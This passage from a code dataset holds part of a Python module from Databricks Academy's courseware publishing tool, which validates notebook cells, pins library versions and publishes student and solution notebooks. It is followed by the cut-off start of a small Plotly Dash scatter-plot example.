str) -> str:\n from dbacademy_courseware.dbbuild import BuildConfig\n if url not in command: return command\n else:\n if f\"{url}@v\" in command:\n version = self.parse_version(command, f\"{url}@v\")\n print(f\"Publishing w/version v{version} for {url}\")\n return command # This is a specific version and should be OK as-is\n\n elif f\"{url}@\" in command:\n # This is a pinned comment and generally not allowed.\n version = self.parse_version(command, f\"{url}@\")\n if self.version in BuildConfig.VERSIONS_LIST:\n print(f\"Publishing w/version @{version} for {url}\")\n self.warn(lambda: False, f\"Building with named branch or commit id ({version}), not a released version, not head - this will prevent publishing.\")\n return command # Don't update, run with it as-is\n else:\n # Fail the build here because we cannot publish this way.\n print(f\"Failing publish of version @{version} for {url}\")\n self.test(lambda: False, f\"Cannot publish with libraries that specify a specific branch or commit id ({version}).\")\n return command # Return the value, will abort later\n else:\n # We are building from the head, so we need to lock in the version number.\n name = url.split(\"/\")[-1]\n commit_id = NotebookDef.get_latest_commit_id(name)\n new_url = f\"{url}@{commit_id}\"\n print(f\"Publishing w/commit \\\"{commit_id}\\\" for {url}\")\n return command.replace(url, new_url)\n\n def test_pip_cells(self, language: str, command: str, i: int) -> str:\n \"\"\"\n Validates %pip cells, mostly to ensure that dbacademy-* resources are fixed to a specific version\n :param language: The language of the corresponding notebook\n :param command: The %run command string to be evaluated\n :param i: The zero-based index to the command within the notebook\n :return: None\n \"\"\"\n import 
re\n\n # First verify that the specified command is a %pip cell\n cm = self.get_comment_marker(language)\n prefix = f\"{cm} MAGIC %pip\"\n if not command.startswith(prefix):\n return command\n\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-gems\")\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-rest\")\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-helper\")\n\n if \"https://github.com/databricks-academy/dbacademy-helper\" in command:\n assert \"https://github.com/databricks-academy/dbacademy-rest\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-helper without including dbacademy-rest\"\n assert \"https://github.com/databricks-academy/dbacademy-gems\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-helper without including dbacademy-gems\"\n elif \"https://github.com/databricks-academy/dbacademy-rest\" in command:\n assert \"https://github.com/databricks-academy/dbacademy-gems\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-rest without including dbacademy-gems\"\n\n # Assuming that %pip is a one-liner or at least should be\n pattern = re.compile(r\"^# MAGIC \", re.MULTILINE)\n libraries = [r for r in pattern.sub(\"\", command).replace(\"\\n\", \" \").split(\" \") if r.startswith(\"git+https://github.com/databricks-academy\")]\n for library in libraries:\n # Not all libraries should be pinned, such as the build tools themselves.\n if library != \"git+https://github.com/databricks-academy/dbacademy-courseware\":\n self.test(lambda: \"@\" in library, f\"Cmd #{i + 1} | The library is not pinned to a specific version: {library}\\n{command}\")\n\n return command\n\n def test_run_cells(self, language: str, command: str, i: int, other_notebooks: list) -> None:\n \"\"\"\n Validates %run cells meet specific requirements\n :param language: The language of the corresponding notebook\n :param command: The %run command string to be evaluated\n :param i: The zero-based index to the command within the notebook\n :param other_notebooks: A complete list of notebooks for cross-validation\n :return: None\n \"\"\"\n\n # First verify that the specified command is a %run cell\n cm = self.get_comment_marker(language)\n prefix = f\"{cm} MAGIC %run\"\n if not command.startswith(prefix):\n return\n\n line_zero = command.split(\"\\n\")[0]\n link = line_zero[len(prefix):].strip()\n\n if link.startswith(\"\\\"\"):\n link = link[1:]\n pos = link.find(\"\\\"\")\n if pos < 0:\n self.warn(lambda: False, f\"Cmd #{i+1} | Missing closing quote in %run target\")\n return\n else:\n link = link[:pos]\n else:\n pos = link.find(\" \")\n if pos > 0:\n link = link[:pos]\n\n self.test_notebook_exists(i, \"%run\", link, link, other_notebooks)\n\n # def validate_single_tick(self, i, command):\n # \"\"\"Test for usage of single-ticks that should also be bolded\"\"\"\n #\n # import re\n #\n # for result in re.findall(r\"[^\\*]`[^\\s]*`[^\\*]\", command):\n # if \"single-tick\" not in self.ignoring:\n # self.warn(lambda: False, f\"Cmd #{i+1} | Found a single-tick block, expected the **`xx`** pattern: \\\"{result}\\\"\")\n\n def validate_md_link(self, i, command, other_notebooks):\n \"\"\"Test for MD links to be replaced with html links\"\"\"\n\n import re\n\n # TODO Fix this error after a proper unit tests is created.\n # noinspection RegExpRedundantEscape\n for link in re.findall(r\"(?\", command)\n\n def validate_html_link(self, i, command):\n \"\"\"Test all HTML links to 
ensure they have a target set to _blank\"\"\"\n\n for link in self.parse_html_links(command):\n if \"target=\\\"_blank\\\"\" not in link:\n self.warn(lambda: False, f\"Cmd #{i+1} | Found HTML link without the required target=\\\"_blank\\\": {link}\")\n\n # Need to validate that the link exists.\n\n def test_source_for(self, command: str, i: int, what: str):\n if what in command:\n pos = command.find(what)\n pos_a = command.rfind(\"\\n\", 0, pos)\n pos_a = 0 if pos_a == -1 else pos_a\n\n pos_b = command.find(\"\\n\", pos)\n pos_b = len(command)-1 if pos_b == -1 else pos_b\n\n line = command[pos_a:pos_b].strip()\n\n prefix = f\"Cmd #{i+1} \"\n padding = \" \"*len(prefix)\n if \"prohibited-dataset\" not in self.ignoring:\n self.warn(lambda: False, f\"{prefix}| Course includes prohibited use of {what}:\\n{padding}| {line}\")\n\n def test_source_cells(self, language: str, command: str, i: int):\n\n if language not in [\"python\", \"scala\", \"sql\", \"java\", \"r\"]:\n return command\n\n self.test_source_for(command, i, \"/mnt/training\")\n self.test_source_for(command, i, \"/databricks-datasets\")\n\n return command\n\n def replace_guid(self, cm: str, command: str, i: int, i18n_guid_map: dict):\n lines = command.strip().split(\"\\n\")\n line_0 = lines[0][7+len(cm):]\n\n parts = line_0.strip().split(\" \")\n for index, part in enumerate(parts):\n if part.strip() == \"\":\n del parts[index]\n\n md_tag = None if len(parts) < 1 else parts[0]\n guid = None if len(parts) < 2 else parts[1].strip()\n\n debug_info = line_0\n\n passed = self.test(lambda: len(lines) > 1, f\"Cmd #{i + 1} | Expected MD to have more than 1 line of code with i18n enabled: {debug_info}\")\n\n if len(parts) == 1:\n passed = passed and self.test(lambda: False, f\"Cmd #{i + 1} | Missing the i18n directive: {debug_info}\")\n else:\n passed = passed and self.test(lambda: len(parts) == 2, f\"Cmd #{i + 1} | Expected the first line of MD to have only two words, found {len(parts)}: {debug_info}\")\n passed = passed and self.test(lambda: parts[0] in [\"%md\", \"%md-sandbox\"], f\"Cmd #{i + 1} | Expected word[0] of the first line of MD to be \\\"%md\\\" or \\\"%md-sandbox\\\", found {parts[0]}: {debug_info}\")\n passed = passed and self.test(lambda: guid.startswith(\"--i18n-\"), f\"Cmd #{i + 1} | Expected word[1] of the first line of MD to start with \\\"--i18n-\\\", found {guid}: {debug_info}\")\n\n if passed:\n passed = passed and self.test(lambda: guid not in self.i18n_guids, f\"Cmd #{i + 1} | Duplicate i18n GUID found: {guid}\")\n\n if passed:\n self.i18n_guids.append(guid)\n\n if not self.i18n_language:\n # This is a \"standard\" publish, just remove the i18n directive\n del lines[0] # Remove the i18n directive\n else:\n # We must confirm that the replacement GUID actually exists\n if self.warn(lambda: guid in i18n_guid_map, f\"The GUID \\\"{guid}\\\" was not found for the translation of {self.i18n_language}\"):\n lines = i18n_guid_map.get(guid).split(\"\\n\")\n\n if self.build_config.i18n_xml_tag_disabled:\n lines.insert(0, f\"{cm} MAGIC {md_tag}\")\n else:\n lines.insert(0, f\"{cm} MAGIC {md_tag} \")\n\n command = \"\\n\".join(lines)\n\n return command\n\n def update_md_cells(self, language: str, command: str, i: int, i18n_guid_map: dict, other_notebooks: list):\n\n # First verify that the specified command is a mark-down cell\n cm = self.get_comment_marker(language)\n if not command.startswith(f\"{cm} MAGIC %md\"):\n return command\n \n # No longer enforcing this requirement\n # self.validate_single_tick(i, command)\n\n 
self.validate_md_link(i, command, other_notebooks)\n self.validate_html_link(i, command)\n\n if not self.i18n:\n return command\n else:\n return self.replace_guid(cm=cm,\n command=command,\n i=i,\n i18n_guid_map=i18n_guid_map)\n\n def create_resource_bundle(self, natural_language: str, source_dir: str, target_dir: str) -> None:\n natural_language = None if natural_language is None else natural_language.lower()\n\n assert type(natural_language) == str, f\"\"\"Expected the parameter \"natural_language\" to be of type \"str\", found \"{type(natural_language)}\" \"\"\"\n assert type(source_dir) == str, f\"\"\"Expected the parameter \"source_dir\" to be of type \"str\", found \"{type(source_dir)}\" \"\"\"\n assert type(target_dir) == str, f\"\"\"Expected the parameter \"target_dir\" to be of type \"str\", found \"{type(target_dir)}\" \"\"\"\n\n print(\"-\" * 80)\n print(f\".../{self.path}\")\n\n source_notebook_path = f\"{source_dir}/{self.path}\"\n\n source_info = self.client.workspace().get_status(source_notebook_path)\n language = source_info[\"language\"].lower()\n\n raw_source = self.client.workspace().export_notebook(source_notebook_path)\n\n cmd_delim = self.get_cmd_delim(language)\n commands = raw_source.split(cmd_delim)\n\n md_commands = list()\n\n for i in range(len(commands)):\n command = commands[i].lstrip()\n\n cm = self.get_comment_marker(language)\n if command.startswith(f\"{cm} MAGIC %md\"):\n md_commands.append(command)\n\n if len(md_commands) == 0:\n print(f\"Skipping resource - 0 MD cells: {self.path}\")\n else:\n # self.publish_resource(language, md_commands, resource_root, resource_path)\n self.publish_resource(language, md_commands, target_dir, natural_language)\n\n def load_i18n_source(self, i18n_resources_dir):\n import os\n\n i18n_source_path = f\"/Workspace{i18n_resources_dir}/{self.path}.md\"\n if os.path.exists(i18n_source_path):\n with open(f\"{i18n_source_path}\") as f:\n source = f.read()\n source = source.replace(\"
\\n--i18n-\", \"<hr>--i18n-\")\n                source = source.replace(\"<hr sandbox>\\n--i18n-\", \"<hr sandbox>--i18n-\")\n                return source\n\n        # i18n_language better be None if the file doesn't exist, or it's in the \"ignored\" round zero or one\n        self.warn(lambda: self.i18n_language is None or self.test_round in [0, 1], f\"Resource not found ({self.test_round}): {i18n_source_path}\")\n\n        return None\n\n    def load_i18n_guid_map(self, i18n_source: str):\n        import re\n\n        if i18n_source is None:\n            return dict()\n\n        i18n_guid_map = dict()\n\n        # parts = re.split(r\"^<hr>--i18n-\", i18n_source, flags=re.MULTILINE)\n        parts = re.split(r\"^<hr>--i18n-|^<hr sandbox>--i18n-\", i18n_source, flags=re.MULTILINE)\n\n        name = parts[0].strip()[3:]\n        self.test(lambda: name == self.path, f\"Expected the notebook \\\"{self.path}\\\" but found\\n \\\"{name}\\\"\")\n\n        for part in parts[1:]:\n            guid, value = self.parse_guid_and_value(part)\n\n            i18n_guid_map[guid] = value\n\n            # sandbox_parts = re.split(r\"^<hr sandbox>
--i18n-\", value, flags=re.MULTILINE)\n # i18n_guid_map[guid] = sandbox_parts[0]\n\n # for sandbox_part in sandbox_parts[1:]:\n # guid, value = self.parse_guid_and_value(sandbox_part)\n # i18n_guid_map[guid] = value\n\n return i18n_guid_map\n\n @staticmethod\n def parse_guid_and_value(part):\n pos = part.find(\"\\n\")\n pos = pos if pos >= 0 else len(part)\n\n guid = f\"--i18n-{part[0:pos]}\".strip()\n value = part[pos+1:]\n\n return guid, value\n\n def publish(self, source_dir: str, target_dir: str, i18n_resources_dir: str, verbose: bool, debugging: bool, other_notebooks: list) -> None:\n assert type(source_dir) == str, f\"\"\"Expected the parameter \"source_dir\" to be of type \"str\", found \"{type(source_dir)}\" \"\"\"\n assert type(target_dir) == str, f\"\"\"Expected the parameter \"target_dir\" to be of type \"str\", found \"{type(target_dir)}\" \"\"\"\n assert type(i18n_resources_dir) == str, f\"\"\"Expected the parameter \"resources_dir\" to be of type \"str\", found \"{type(i18n_resources_dir)}\" \"\"\"\n assert type(verbose) == bool, f\"\"\"Expected the parameter \"verbose\" to be of type \"bool\", found \"{type(verbose)}\" \"\"\"\n assert type(debugging) == bool, f\"\"\"Expected the parameter \"debugging\" to be of type \"bool\", found \"{type(debugging)}\" \"\"\"\n\n assert type(other_notebooks) == list, f\"\"\"Expected the parameter \"other_notebooks\" to be of type \"list\", found \"{type(other_notebooks)}\" \"\"\"\n for i, notebook in enumerate(other_notebooks):\n assert type(other_notebooks[i]) == NotebookDef, f\"\"\"Expected the parameter \"other_notebooks[{i}]\" to be of type \"NotebookDef\", found \"{type(other_notebooks[i])}\" \"\"\"\n\n self.errors = list()\n self.warnings = list()\n self.i18n_guids = list()\n\n print()\n print(\"=\" * 80)\n print(f\".../{self.path}\")\n\n source_notebook_path = f\"{source_dir}/{self.path}\"\n source_info = self.client.workspace().get_status(source_notebook_path)\n language = source_info[\"language\"].lower()\n\n raw_source = self.client.workspace().export_notebook(source_notebook_path)\n\n i18n_source = self.load_i18n_source(i18n_resources_dir)\n i18n_guid_map = self.load_i18n_guid_map(i18n_source)\n\n skipped = 0\n students_commands = []\n solutions_commands = []\n\n cmd_delim = self.get_cmd_delim(language)\n commands = raw_source.split(cmd_delim)\n\n todo_count = 0\n answer_count = 0\n\n include_header = False\n found_header_directive = False\n\n include_footer = False\n found_footer_directive = False\n\n for i in range(len(commands)):\n if debugging:\n print(\"\\n\" + (\"=\" * 80))\n print(f\"Debug Command {i + 1}\")\n\n command = commands[i].lstrip()\n\n self.test(lambda: \"DBTITLE\" not in command, f\"Cmd #{i+1} | Unsupported Cell-Title found\")\n\n # Misc tests for language specific cells\n command = self.test_source_cells(language, command, i)\n\n # Misc tests specific to %md cells along with i18n specific rewrites\n command = self.update_md_cells(language, command, i, i18n_guid_map, other_notebooks)\n\n # Misc tests specific to %run cells\n self.test_run_cells(language, command, i, other_notebooks)\n\n # Misc tests specific to %pip cells\n command = self.test_pip_cells(language, command, i)\n\n # Extract the leading comments and then the directives\n leading_comments = self.get_leading_comments(language, command.strip())\n directives = self.parse_directives(i, leading_comments)\n\n if debugging:\n if len(leading_comments) > 0:\n print(\" |-LEADING COMMENTS --\" + (\"-\" * 57))\n for comment in leading_comments:\n print(\" |\" 
+ comment)\n else:\n print(\" |-NO LEADING COMMENTS --\" + (\"-\" * 54))\n\n if len(directives) > 0:\n print(\" |-DIRECTIVES --\" + (\"-\" * 62))\n for directive in directives:\n print(\" |\" + directive)\n else:\n print(\" |-NO DIRECTIVES --\" + (\"-\" * 59))\n\n # Update flags to indicate if we found the required header and footer directives\n include_header = True if D_INCLUDE_HEADER_TRUE in directives else include_header\n found_header_directive = True if D_INCLUDE_HEADER_TRUE in directives or D_INCLUDE_HEADER_FALSE in directives else found_header_directive\n\n include_footer = True if D_INCLUDE_FOOTER_TRUE in directives else include_footer\n found_footer_directive = True if D_INCLUDE_FOOTER_TRUE in directives or D_INCLUDE_FOOTER_FALSE in directives else found_footer_directive\n\n # Make sure we have one and only one directive in this command (ignoring the header directives)\n directive_count = 0\n for directive in directives:\n if directive not in [D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE, D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE]:\n directive_count += 1\n self.test(lambda: directive_count <= 1, f\"Cmd #{i+1} | Found multiple directives ({directive_count}): {directives}\")\n\n # Process the various directives\n if command.strip() == \"\":\n skipped += self.skipping(i, \"Empty Cell\")\n elif D_SOURCE_ONLY in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_HEADER_TRUE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_HEADER_FALSE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_FOOTER_TRUE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_FOOTER_FALSE in directives: skipped += self.skipping(i, None)\n\n elif D_TODO in directives:\n # This is a TO-DO cell, exclude from solution notebooks\n todo_count += 1\n command = self.clean_todo_cell(language, command, i)\n students_commands.append(command)\n\n elif D_ANSWER in directives:\n # This is an ANSWER cell, exclude from lab notebooks\n answer_count += 1\n solutions_commands.append(command)\n\n elif D_DUMMY in directives:\n students_commands.append(command)\n solutions_commands.append(command.replace(\"DUMMY\",\n \"DUMMY: Ya, that wasn't too smart. 
Then again, this is just a dummy-directive\"))\n\n else:\n # Not a TO-DO or ANSWER, just append to both\n students_commands.append(command)\n solutions_commands.append(command)\n\n # Check the command for BDC markers\n bdc_tokens = [\"IPYTHON_ONLY\", \"DATABRICKS_ONLY\",\n \"AMAZON_ONLY\", \"AZURE_ONLY\", \"TEST\", \"PRIVATE_TEST\", \"INSTRUCTOR_NOTE\", \"INSTRUCTOR_ONLY\",\n \"SCALA_ONLY\", \"PYTHON_ONLY\", \"SQL_ONLY\", \"R_ONLY\"\n \"VIDEO\", \"ILT_ONLY\", \"SELF_PACED_ONLY\", \"INLINE\",\n \"NEW_PART\", \"{dbr}\"]\n\n for token in bdc_tokens:\n self.test(lambda: token not in command, f\"\"\"Cmd #{i+1} | Found the token \"{token}\" \"\"\")\n\n cm = self.get_comment_marker(language)\n if not command.startswith(f\"{cm} MAGIC %md\"):\n if language.lower() == \"python\":\n if \"lang-python\" not in self.ignoring:\n self.warn(lambda: \"%python\" not in command, f\"\"\"Cmd #{i+1} | Found \"%python\" in a Python notebook\"\"\")\n elif language.lower() == \"sql\":\n if \"lang-sql\" not in self.ignoring:\n self.warn(lambda: \"%sql\" not in command, f\"\"\"Cmd #{i+1} | Found \"%sql\" in a SQL notebook\"\"\")\n elif language.lower() == \"scala\":\n if \"lang-scala\" not in self.ignoring:\n self.warn(lambda: \"%scala\" not in command, f\"\"\"Cmd #{i+1} | Found \"%scala\" in a Scala notebook\"\"\")\n elif language.lower() == \"r\":\n # We have to check both cases so as not to catch %run by accident\n if \"lang-r\" not in self.ignoring:\n self.warn(lambda: \"%r \" not in command, f\"\"\"Cmd #{i+1} | Found \"%r\" in an R notebook\"\"\")\n self.warn(lambda: \"%r\\n\" not in command, f\"\"\"Cmd #{i+1} | Found \"%r\" in an R notebook\"\"\")\n else:\n raise Exception(f\"The language {language} is not supported\")\n\n for year in range(2017, 2999):\n tag = f\"{year} Databricks, Inc\"\n self.test(lambda: tag not in command, f\"\"\"Cmd #{i+1} | Found copyright ({tag}) \"\"\")\n\n self.test(lambda: found_header_directive, f\"One of the two header directives ({D_INCLUDE_HEADER_TRUE} or {D_INCLUDE_HEADER_FALSE}) were not found.\")\n self.test(lambda: found_footer_directive, f\"One of the two footer directives ({D_INCLUDE_FOOTER_TRUE} or {D_INCLUDE_FOOTER_FALSE}) were not found.\")\n self.test(lambda: answer_count >= todo_count, f\"Found more {D_TODO} commands ({todo_count}) than {D_ANSWER} commands ({answer_count})\")\n\n if include_header is True:\n students_commands.insert(0, self.get_header_cell(language))\n solutions_commands.insert(0, self.get_header_cell(language))\n\n if include_footer is True:\n students_commands.append(self.get_footer_cell(language))\n solutions_commands.append(self.get_footer_cell(language))\n\n for key in [\"\\\"\", \"*\", \"<\", \">\", \"?\", \"\\\\\", \"|\", \":\"]:\n # Not checking for forward slash as the platform itself enforces this.\n self.warn(lambda: key not in self.path, f\"Found invalid character {key} in notebook name: {self.path}\")\n\n # Create the student's notebooks\n students_notebook_path = f\"{target_dir}/{self.path}\"\n common.print_if(verbose, students_notebook_path)\n common.print_if(verbose, f\"...publishing {len(students_commands)} commands\")\n self.publish_notebook(language, students_commands, students_notebook_path, print_warnings=True)\n\n # Create the solutions notebooks\n if self.include_solution:\n solutions_notebook_path = f\"{target_dir}/Solutions/{self.path}\"\n common.print_if(verbose, solutions_notebook_path)\n common.print_if(verbose, f\"...publishing {len(solutions_commands)} commands\")\n self.publish_notebook(language, solutions_commands, 
solutions_notebook_path, print_warnings=False)\n\n def publish_resource(self, language: str, md_commands: list, target_dir: str, natural_language: str) -> None:\n import os\n\n m = self.get_comment_marker(language)\n target_path = f\"{target_dir}/{natural_language}/{self.path}\"\n\n final_source = f\"# /{self.path}\\n\"\n\n # Processes all commands except the last\n for md_command in md_commands:\n md_command = md_command.replace(f\"{m} MAGIC \", \"\")\n md_command = md_command.replace(f\"%md-sandbox --i18n-\", f\"
--i18n-\")\n md_command = md_command.replace(f\"%md --i18n-\", f\"
--i18n-\")\n final_source += md_command\n final_source += \"\\n\"\n\n final_source = self.replace_contents(final_source)\n\n target_file = \"/Workspace\"+target_path+\".md\"\n target_dir = \"/\".join(target_file.split(\"/\")[:-1])\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n\n if os.path.exists(target_file):\n os.remove(target_file)\n\n with open(target_file, \"w\") as w:\n w.write(final_source)\n\n def publish_notebook(self, language: str, commands: list, target_path: str, print_warnings: bool) -> None:\n m = self.get_comment_marker(language)\n final_source = f\"{m} Databricks notebook source\\n\"\n\n # Processes all commands except the last\n for command in commands[:-1]:\n final_source += command\n final_source += self.get_cmd_delim(language)\n\n # Process the last command\n m = self.get_comment_marker(language)\n final_source += commands[-1]\n final_source += \"\" if commands[-1].startswith(f\"{m} MAGIC\") else \"\\n\\n\"\n\n final_source = self.replace_contents(final_source)\n\n self.assert_no_errors(print_warnings)\n\n parent_dir = \"/\".join(target_path.split(\"/\")[0:-1])\n self.client.workspace().mkdirs(parent_dir)\n self.client.workspace().import_notebook(language.upper(), target_path, final_source)\n\n def clean_todo_cell(self, source_language, command, i):\n new_command = \"\"\n lines = command.split(\"\\n\")\n source_m = self.get_comment_marker(source_language)\n\n first = 0\n prefix = source_m\n\n for test_a in [\"%r\", \"%md\", \"%sql\", \"%python\", \"%scala\"]:\n test_b = f\"{source_m} MAGIC {test_a}\"\n if len(lines) > 1 and (lines[0].startswith(test_a) or lines[0].startswith(test_b)):\n first = 1\n cell_m = self.get_comment_marker(test_a)\n prefix = f\"{source_m} MAGIC {cell_m}\"\n\n for index in range(len(lines)):\n line = lines[index]\n\n if index == 0 and first == 1:\n # This is the first line, but the first is a magic command\n new_command += line\n\n elif (index == first) and line.strip() not in [f\"{prefix} {D_TODO}\"]:\n self.test(lambda: False, f\"\"\"Cmd #{i + 1} | Expected line #{index + 1} to be the \"{D_TODO}\" directive: \"{line}\" \"\"\")\n\n elif not line.startswith(prefix) and line.strip() != \"\" and line.strip() != f\"{source_m} MAGIC\":\n self.test(lambda: False, f\"\"\"Cmd #{i + 1} | Expected line #{index + 1} to be commented out: \"{line}\" with prefix \"{prefix}\" \"\"\")\n\n elif line.strip().startswith(f\"{prefix} {D_TODO}\"):\n # Add as-is\n new_command += line\n\n elif line.strip() == \"\" or line.strip() == f\"{source_m} MAGIC\":\n # No comment, do not process\n new_command += line\n\n elif line.strip().startswith(f\"{prefix} \"):\n # Remove comment and space\n length = len(prefix) + 1\n new_command += line[length:]\n\n else:\n # Remove just the comment\n length = len(prefix)\n new_command += line[length:]\n\n # Add new line for all but the last line\n if index < len(lines) - 1:\n new_command += \"\\n\"\n\n return new_command\n\n def replace_contents(self, contents: str):\n import re\n\n for key in self.replacements:\n old_value = \"{{\" + key + \"}}\"\n new_value = self.replacements[key]\n contents = contents.replace(old_value, new_value)\n\n # TODO Fix this error after a proper unit tests is created.\n # noinspection RegExpDuplicateCharacterInClass\n mustache_pattern = re.compile(r\"{{[a-zA-Z\\-\\\\_\\\\#\\\\/]*}}\")\n result = mustache_pattern.search(contents)\n if result is not None:\n self.test(lambda: False, f\"A mustache pattern was detected after all replacements were processed: {result}\")\n\n for icon in 
[\":HINT:\", \":CAUTION:\", \":BESTPRACTICE:\", \":SIDENOTE:\", \":NOTE:\"]:\n if icon in contents:\n self.test(lambda: False, f\"The deprecated {icon} pattern was found after all replacements were processed.\")\n\n # No longer supported\n # replacements[\":HINT:\"] = \"\"\" **Hint:**\"\"\"\n # replacements[\":CAUTION:\"] = \"\"\"\"\"\"\n # replacements[\":BESTPRACTICE:\"] = \"\"\"\"\"\"\n # replacements[\":SIDENOTE:\"] = \"\"\"\"\"\"\n\n return contents\n\n @staticmethod\n def get_comment_marker(language):\n language = language.replace(\"%\", \"\")\n\n if language.lower() in \"python\":\n return \"#\"\n elif language.lower() in \"sql\":\n return \"--\"\n elif language.lower() in \"md\":\n return \"--\"\n elif language.lower() in \"r\":\n return \"#\"\n elif language.lower() in \"scala\":\n return \"//\"\n else:\n raise ValueError(f\"The language {language} is not supported.\")\n\n @staticmethod\n def get_cmd_delim(language):\n marker = NotebookDef.get_comment_marker(language)\n return f\"\\n{marker} COMMAND ----------\\n\"\n\n def get_leading_comments(self, language, command) -> list:\n leading_comments = []\n lines = command.split(\"\\n\")\n\n source_m = self.get_comment_marker(language)\n first_line = lines[0].lower()\n\n if first_line.startswith(f\"{source_m} magic %md\"):\n cell_m = self.get_comment_marker(\"md\")\n elif first_line.startswith(f\"{source_m} magic %sql\"):\n cell_m = self.get_comment_marker(\"sql\")\n elif first_line.startswith(f\"{source_m} magic %python\"):\n cell_m = self.get_comment_marker(\"python\")\n elif first_line.startswith(f\"{source_m} magic %scala\"):\n cell_m = self.get_comment_marker(\"scala\")\n elif first_line.startswith(f\"{source_m} magic %run\"):\n cell_m = source_m # Included to preclude trapping for R language below\n elif first_line.startswith(f\"{source_m} magic %r\"):\n cell_m = self.get_comment_marker(\"r\")\n else:\n cell_m = source_m\n\n for il in range(len(lines)):\n line = lines[il]\n\n # Start by removing any \"source\" prefix\n if line.startswith(f\"{source_m} MAGIC\"):\n length = len(source_m) + 6\n line = line[length:].strip()\n\n elif line.startswith(f\"{source_m} COMMAND\"):\n length = len(source_m) + 8\n line = line[length:].strip()\n\n # Next, if it starts with a magic command, remove it.\n if line.strip().startswith(\"%\"):\n # Remove the magic command from this line\n pos = line.find(\" \")\n if pos == -1:\n line = \"\"\n else:\n line = line[pos:].strip()\n\n # Finally process the refactored-line for any comments.\n if line.strip() == cell_m or line.strip() == \"\":\n # empty comment line, don't break, just ignore\n pass\n\n elif line.strip().startswith(cell_m):\n # append to our list\n comment = line.strip()[len(cell_m):].strip()\n leading_comments.append(comment)\n\n else:\n # All done, this is a non-comment\n return leading_comments\n\n return leading_comments\n\n def parse_directives(self, i, comments):\n import re\n\n directives = list()\n\n for line in comments:\n if line == line.upper():\n # The comment is in all upper case,\n # must be one or more directives\n directive = line.strip()\n mod_directive = re.sub(\"[^-a-zA-Z_]\", \"_\", directive)\n\n if directive in [\"SELECT\", \"FROM\", \"AS\", \"AND\"]:\n pass # not a real directive, but flagged as one because of its SQL syntax\n\n elif directive in [D_TODO, D_ANSWER, D_SOURCE_ONLY,\n D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE,\n D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE]:\n directives.append(line)\n\n elif \"FILL-IN\" in directive or \"FILL_IN\" in directive:\n 
pass # Not a directive, just a random chance\n\n elif directive != mod_directive:\n if mod_directive in [f\"__{D_TODO}\", f\"___{D_TODO}\"]:\n self.test(lambda: False, f\"Cmd #{i+1} | Found double-comment of TODO directive\")\n\n # print(f\"Skipping directive: {directive} vs {mod_directive}\")\n pass # Number and symbols are not used in directives\n\n else:\n reslut_a = self.warn(lambda: \" \" not in directive, f\"\"\"Cmd #{i+1} | Whitespace found in directive \"{directive}\": {line}\"\"\")\n reslut_b = self.warn(lambda: \"-\" not in directive, f\"\"\"Cmd #{i+1} | Hyphen found in directive \"{directive}\": {line}\"\"\")\n reslut_c = self.warn(lambda: directive in SUPPORTED_DIRECTIVES, f\"\"\"Cmd #{i+1} | Unsupported directive \"{directive}\", see dbacademy.dbpublish.help_html() for more information.\"\"\")\n if reslut_a and reslut_b and reslut_c:\n directives.append(line)\n\n return directives\n\n @staticmethod\n def skipping(i, label):\n if label:\n print(f\"Cmd #{i+1} | Skipping: {label}\")\n return 1\n\n def get_header_cell(self, language):\n m = self.get_comment_marker(language)\n return f\"\"\"\n {m} MAGIC\n {m} MAGIC %md-sandbox\n {m} MAGIC\n {m} MAGIC
\n {m} MAGIC \"Databricks\n {m} MAGIC
\n \"\"\".strip()\n\n def get_footer_cell(self, language):\n from datetime import date\n\n m = self.get_comment_marker(language)\n return f\"\"\"\n {m} MAGIC %md-sandbox\n {m} MAGIC © {date.today().year} Databricks, Inc. All rights reserved.
\n    {m} MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.<br/>
\n    {m} MAGIC <br/>
\n {m} MAGIC Privacy Policy | Terms of Use | Support\n \"\"\".strip()\n","repo_name":"databricks-academy/dbacademy-courseware","sub_path":"src/dbacademy_courseware/dbpublish/notebook_def_class.py","file_name":"notebook_def_class.py","file_ext":"py","file_size_in_byte":43157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6232632647","text":"#######\n# Here we'll use the mpg.csv dataset to demonstrate\n# how multiple inputs can affect the same graph.\n######\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport pandas as pd\n\napp = dash.Dash()\n\ndf = pd.read_csv('../data/mpg.csv')\n\nfeatures = df.columns\n\napp.layout = html.Div([\n\n html.Div([\n dcc.Dropdown(\n id='xaxis',\n options=[{'label': i.title(), 'value': i} for i in features],\n value='displacement'\n )\n ],\n style={'width': '48%', 'display': 'inline-block'}),\n\n html.Div([\n dcc.Dropdown(\n id='yaxis',\n options=[{'label': i.title(), 'value': i} for i in features],\n value='acceleration'\n )\n ],style={'width': '48%', 'float': 'right', 'display': 'inline-block'}),\n\n dcc.Graph(id='feature-graphic')\n], style={'padding':10})\n\n@app.callback(\n Output('feature-graphic', 'figure'),\n [Input('xaxis', 'value'),\n Input('yaxis', 'value')])\ndef update_graph(xaxis_name, yaxis_name):\n return {\n 'data': [go.Scatter(\n x=df[xaxis_name],\n y=df[yaxis_name],\n text=df['name'],\n mode='markers',\n marker={\n 'size': 15,\n 'opacity': 0.5,\n 'line': {'width': 0.5, 'color': 'white'}\n }\n )],\n 'layout': go.Layout(\n xaxis={'title': xaxis_name.title()},\n yaxis={'title': yaxis_name.title()},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 0},\n hovermode='closest'\n )\n }\n\nif __name__ == '__main__':\n 